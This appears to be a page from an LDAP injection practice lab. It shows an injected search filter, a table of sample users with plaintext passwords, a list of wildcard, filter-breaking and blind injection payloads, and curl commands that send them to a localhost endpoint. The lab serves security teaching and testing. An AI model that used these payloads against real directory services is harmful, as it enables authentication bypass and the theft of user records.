LDAP Injection Simulator
LDAP Search Filter
Filter: (|(uid=admin)(|(uid=*)(cn=admin)(|(uid=*))
LDAP Search Results
| UID | CN | Password | |
|---|---|---|---|
| admin | admin | admin@acunetix.com | secret@123 |
| test | test | test@acunetix.com | test |
| wasp | wasp | wasp@acunetix.com | wasp123 |
| john | john | john@acunetix.com | doe123 |
LDAP Injection detected — returned multiple entries!
LDAP Injection Tests
Injection Payloads
- Wildcard: ?username=* — returns ALL users
- Injection:
*)(uid=*))(&(uid=* - Normal: ?username=admin
- Auth: admin/secret@123
- Blind:
admin)(|(uid=*
curl Test
# LDAP wildcard — get all users curl "http://localhost/ldap.php?username=*" # LDAP injection bypass curl "http://localhost/ldap.php?username=*)(uid=*))(|(uid=*"